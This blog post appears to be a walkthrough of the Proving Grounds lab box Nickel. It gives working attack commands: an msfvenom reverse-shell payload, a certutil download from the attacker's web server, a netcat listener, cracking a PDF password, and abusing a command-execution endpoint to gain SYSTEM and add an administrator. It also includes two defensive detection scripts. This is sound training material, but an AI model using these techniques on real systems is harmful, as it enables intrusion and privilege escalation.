PG Practice - Nickel Walkthrough

Dec 26, 2023 · 6 mins read
Introduction

In this post, an in-depth look at Nickel, a challenging box from the Offensive Security Proving Grounds Practice Labs.

Summary

The initial reconnaissance on the Nickel box commenced with an NMAP scan, revealing an open FTP service on port 21. Attempts to log in anonymously were unsuccessful. Subsequently, attention was directed to a webserver operating on port 8089, where a DevOps dashboard was identified.

Further exploration of other endpoints on the webpage led to the /list-running-procs? endpoint, which intriguingly redirected to the BOX’s IP on port 33333. An initial GET request yielded no results. However, a subsequent POST request returned a response, albeit requiring a content length header. Upon adding this, a list of running processes was retrieved.

Among these processes, SSH credentials were found hard-coded, with the password being base64 encoded. Decoding the password facilitated gaining initial access through SSH to Nickel.

Post-compromise enumeration uncovered an Infrastructure.pdf file, which was exfiltrated via SCP. The file was password-protected and the password was subsequently cracked using Pdfcrack, aided by the rockyou wordlist.

The information gleaned from the cracked PDF file revealed previously inaccessible internal endpoints. Particularly noteworthy was a temporary command execution endpoint. Remote Code Execution (RCE) was achieved by making an API GET request using PowerShell, allowing for the execution of commands remotely.

The execution of the command whoami /priv revealed that the endpoint operated with SYSTEM privileges. This discovery enabled privilege escalation by adding the user ariah to the local administrators group, granting access to read the proof.txt file.

NMAP Scan

Starting off with an NMAP scan:

Nmap scan report for 192.168.152.99
Host is up, received echo-reply ttl 125 (0.053s latency).
Scanned at 2023-06-22 15:38:08 EDT for 190s
Not shown: 65528 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd
| ftp-syst: 
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh syn-ack ttl 125 OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
| 3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)
| 256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDJYE805huwKUl0fJM8+N9Mk7GUQeEEc5iA/yYqgxE7Bwgz4h5xufRONkR6bWxcxu8/AHslwkkDkjRKNdr4uFzY=
| 256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL8cLYuHBTVFfYPb/YzUIyT39bUzA/sPDFEC/xChZyZ4
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2023-06-22T19:41:17+00:00; -1s from scanner time.
| rdp-ntlm-info: 
| Target_Name: NICKEL
| NetBIOS_Domain_Name: NICKEL
| NetBIOS_Computer_Name: NICKEL
| DNS_Domain_Name: nickel
| DNS_Computer_Name: nickel
| Product_Version: 10.0.18362
|_ System_Time: 2023-06-22T19:40:11+00:00
| ssl-cert: Subject: commonName=nickel
| Issuer: commonName=nickel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-21T19:35:40
| Not valid after: 2023-12-21T19:35:40
| MD5: 16c3:ee72:4391:21d6:b8e7:a8d9:e921:abe5
| SHA-1: 4e4e:fcef:fdb0:9c7f:bdb7:ae33:1f84:5668:9b84:5ac9
8089/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-favicon: Unknown favicon MD5: 9D1EAD73E678FA2F51A70A933B0BF017
| http-methods: 
|_ Supported Methods: GET
|_http-title: Site doesn't have a title.
33333/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-favicon: Unknown favicon MD5: 76C5844B4ABE20F72AA23CBE15B2494E
| http-methods: 
|_ Supported Methods: GET POST
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Always try the low-hanging fruit first: the FTP service on port 21 is not accepting anonymous logins.

Information Gathering

Webserver on port 8089

The next target of interest is the HTTP webserver on port 8089.

Navigating to List Running Processes redirects to port 33333.

Doing a GET request on NICKEL:33333 returns the following:

A POST request returns the following:

The highlighted error in the HTTP response states that the POST request requires a Content-Length header.

A list of running processes was successfully retrieved. The significant discovery in this list was the presence of SSH credentials belonging to the user ariah. Notably, the password associated with these credentials appeared to be encoded in base64.

Decoding the base64 returns a password.

echo "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" | base64 -d

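The weakness found here is a secret passed on a process command line, where any user who can list processes can read it; base64 only hides it from casual view. As an added example (not part of the original walkthrough), the following Python audit scans a process listing for secret-bearing flags and shows that such values decode straight back to plaintext. The listing, the process names and the encoded value are constructed for the example.

```python
import base64
import re
from typing import Optional

# Constructed sample of a running-process listing (not the box's real output).
# The last entry carries a password on its command line, base64-encoded.
SAMPLE_PROCS = """\
412   svchost.exe  C:\\Windows\\System32\\svchost.exe -k netsvcs
1688  ssh.exe      C:\\Windows\\System32\\OpenSSH\\ssh.exe -p 22 svc@10.0.0.5
2044  sync.exe     C:\\tools\\sync.exe --user ariah --password RXhhbXBsZVBhc3N3MHJkIQ== --remote 10.0.0.5
"""

# Command-line flags whose next token is usually a secret.
SECRET_FLAG = re.compile(r"(?i)(?:--?|/)(?:pass(?:word)?|pwd|secret|token)[=\s:]+(\S+)")


def decode_if_base64(value: str) -> Optional[str]:
    """Return the decoded text when value is base64 of printable ASCII, else None."""
    if len(value) < 8 or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    text = text.strip()
    return text if text and text.isprintable() else None


def find_exposed_secrets(listing: str) -> list:
    """Flag every process whose command line passes a secret via a known flag."""
    findings = []
    for line in listing.splitlines():
        parts = line.split(None, 2)          # pid, image name, command line
        if len(parts) < 3 or not parts[0].isdigit():
            continue                          # header or malformed row
        pid, image, cmdline = parts
        for match in SECRET_FLAG.finditer(cmdline):
            value = match.group(1)
            findings.append({
                "pid": int(pid), "image": image, "value": value,
                # base64 is an encoding, not encryption: record the plaintext it hides
                "decoded": decode_if_base64(value),
            })
    return findings


if __name__ == "__main__":
    for f in find_exposed_secrets(SAMPLE_PROCS):
        hint = f" (base64 of {f['decoded']!r})" if f["decoded"] else ""
        print(f"PID {f['pid']} {f['image']}: secret on command line{hint}")
```
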
Initial Access

Upon enumerating the webserver on port 8089, SSH credentials were found within the list of running processes. The initial access point into Nickel is via SSH.

ssh ariah@192.168.152.99

Reverse Shell

To gain a reverse shell, the next step involves generating a payload using MSFVENOM:

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=80 -f exe > shell.exe

The MSFVENOM generated payload can be transferred either through SCP or by leveraging certutil.

SCP Method

scp shell.exe ariah@192.168.152.99:C:/users/ariah/

Certutil Method

To use this method, the payload must be hosted on a web server, specifically on port 80. The box restricts outbound traffic; however, it does accept connections on port 80 from any available interface.

To check what ports are listening for outbound traffic:

netstat -ano

Use Python to set up a webserver on port 80.

python3 -m http.server 80

Download the payload using certutil:

certutil.exe -urlcache -f -split "http://192.168.45.218/shell.exe"

Terminate the HTTP server and set up a listener on port 80:

rlwrap nc -lvnp 80

Execute the payload in the SSH session to gain a reverse shell:

.\shell.exe

Post-Compromise Enumeration

Users

whoami /priv

net users

User Files and Folders

At the root of the C:\ drive, a folder named FTP can be found. This folder houses the previously inaccessible FTP service. The folder contains an interesting PDF file: Infrastructure.pdf.

The PDF file can be transferred to our local machine via SCP.

scp ariah@192.168.152.99:C:/ftp/Infrastructure.pdf .

The PDF file is password protected.

The tool Pdfcrack will be used to crack the password-protected PDF file, leveraging the rockyou wordlist.

pdfcrack -f Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt

The password ‘ariah4168’ was successfully recovered.

Post-Compromise Exploitation

The cracked PDF file reveals interesting information, such as the presence of more web servers. A key finding is a temporary command endpoint that allows remote code execution (RCE).

A temporary command endpoint is identified at http://nickel/?. It can be interacted with by sending GET requests to the API endpoint from PowerShell, using the Invoke-WebRequest cmdlet along with the -UseBasicParsing parameter.

$Resp = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing

The command $Resp = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing runs whoami on the target and stores the response in the variable $Resp. Its RawContent property holds the raw, unprocessed HTTP response, which includes the status line, headers, and body content.

$Resp.RawContent

When the output from the $Resp.RawContent variable was inspected, it was revealed that Remote Code Execution (RCE) with SYSTEM privileges had been achieved. However, due to outbound traffic being blocked, spawning a secondary reverse shell with SYSTEM privileges was not possible. Despite this limitation, the ability to execute commands as SYSTEM remained, which enabled the addition of the current user, ‘ariah’, to the Administrators group.
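
An endpoint that runs whatever arrives in its query string leaves a distinctive trace in the web server's access log: a bare command where a key=value parameter list would normally be. The following Python detection, added here and not part of the original walkthrough, parses W3C-style access-log lines (the field order is an assumption) and flags requests that carry a command to such an endpoint; the log lines are constructed for the example.

```python
from typing import Optional
from urllib.parse import unquote_plus

# Constructed W3C-style access-log lines (assumed field order: date time s-ip
# cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent)
# sc-status). Not taken from the box; two requests carry a bare command as query.
SAMPLE_LOG = """\
2023-06-22 19:45:01 10.0.0.9 GET / - 80 - 10.0.0.50 Mozilla/5.0 200
2023-06-22 19:45:07 10.0.0.9 GET / whoami+/priv 80 - 10.0.0.50 PowerShell/7.3 200
2023-06-22 19:45:12 10.0.0.9 GET /status id=42 80 - 10.0.0.51 Mozilla/5.0 200
2023-06-22 19:45:20 10.0.0.9 GET / net+user 80 - 10.0.0.50 curl/8.0 200
"""

FIELDS = ("date", "time", "s_ip", "method", "stem", "query", "port", "user", "c_ip", "ua", "status")

# First word of a query that signals a command rather than a parameter list.
COMMAND_WORDS = {"whoami", "net", "cmd", "powershell", "certutil", "systeminfo", "ipconfig", "tasklist", "type", "dir"}


def parse_line(line: str) -> Optional[dict]:
    """Split one W3C log line into named fields; skip directives and malformed rows."""
    if line.startswith("#") or not line.strip():
        return None
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def is_command_query(query: str) -> bool:
    """True when the decoded query reads as a command line, e.g. '?whoami+/priv'."""
    if query == "-":                      # W3C marker for 'no query string'
        return False
    tokens = unquote_plus(query).split()
    if not tokens or "=" in tokens[0]:    # empty, or ordinary key=value parameters
        return False
    return tokens[0].lower() in COMMAND_WORDS


def find_command_requests(log: str) -> list:
    """Return the parsed records whose query string is a command, with it decoded."""
    hits = []
    for line in log.splitlines():
        rec = parse_line(line)
        if rec and is_command_query(rec["query"]):
            rec["command"] = unquote_plus(rec["query"])
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for h in find_command_requests(SAMPLE_LOG):
        print(f"{h['date']} {h['time']} {h['c_ip']} -> {h['stem']} ran: {h['command']}")
```
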

Conclusion

Alternatively, there’s also the option to gain a reverse shell by leveraging the same API GET request. This can be done either by executing the same MSFVENOM payload previously uploaded to the C:\users\ariah directory or by using CURL to the same temporary command execution endpoint.